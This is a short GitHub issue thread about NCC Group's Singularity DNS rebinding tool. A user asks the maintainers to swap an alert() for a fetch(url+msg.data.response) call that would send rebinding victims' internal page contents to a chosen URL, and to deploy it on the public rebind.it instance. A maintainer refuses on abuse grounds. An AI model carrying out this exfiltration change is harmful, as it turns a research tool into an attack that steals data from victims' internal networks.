### ISSUE TITLE
Suggestion !!

### ISSUE THREAD

**Issue by CXVVMVII** [nccgroup/singularity#34]
I'm huge follower to you guys ,
Your Singularity DNS rebinding tool is such an amazing tool , i just tried to set it up on my own, but i terribly failed and get errors each step i do , 
The only thing that i wanted to do is making a "fetch" api request instead of showing "alert'" of the result ,exactly at https://github.com/nccgroup/singularity/blob/4744064e35cd6a3759630868d6a21597faf73234/html/manager.js in the line "574"

instead of making 
```
alert('Target home page contents:\n' +msg.data.response);
```
just make it
```
fetch(url+msg.data.response); 
```

and add an html/js to manage the content receiver url ,
please if you don't mind made this change and apply it at http://rebind.it:8080/,

I tried to host it on my own and as i previously said by i faced alot of errors ,
**I don't want to disrespect you (i'm not meaning that at all)** , but i'd help with money if it's required .

And thanks for time and your great research & services
Please do not ignore

**Comment by gdncc** [comment]
This is not going to happen. This would turn all live Singularity instances, including rebind.it, into an open attack tool for anybody to use. Your best bet is to deploy your own instance.  Investigate your deployment issue and consider asking for assistance if you are stuck.

**Comment by ProgramFilesx86** [comment]
Oh sorry ,
I totally understood , surely this will be abused ,
Anyway thanks for reaching out , the tool is powerful
